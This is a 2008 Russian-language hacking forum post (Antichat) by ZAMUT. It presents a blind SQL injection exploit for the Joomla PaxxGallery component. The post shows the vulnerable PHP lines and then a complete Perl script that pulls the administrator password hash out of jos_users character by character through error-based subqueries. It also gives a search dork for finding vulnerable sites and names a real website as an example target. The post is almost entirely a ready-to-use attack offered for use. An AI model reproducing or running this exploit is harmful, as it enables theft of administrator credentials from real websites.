
27.04.2008, 19:30
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме: 6905523
Репутация:
1174
|
|
Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"
Vuln code:
PHP код:
.....
global $database;
$id = $_POST["id"];
$gid = $_POST["gid"];
if (isset($id)) {
.....
Exploit:
Код:
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+-- \"more than 1 row\" --+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gid= --+-\n";
print "-+-- Dork: option=com_paxxgallery --+-\n";
# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34
print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;
my $i=1;
my $log= 1;
my ($content,$result) = undef;
my $request = 0;
while($log)
{
$content = get($ur1.'+and+1=(select+1+from+jos_users+where+length(if(ascii(upper(substring((select+password+from+jos_users+where+id=62),'.$i.',1)))='.$n.',password,id))>4)/*'.$ur2);
if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}
elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}
else {$n++; if($n==58){$n=65} }
$request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;
Dork: option=com_paxxgallery
ZAMUT (c)
Последний раз редактировалось ZAMUT; 29.04.2008 в 01:11..
|
|
|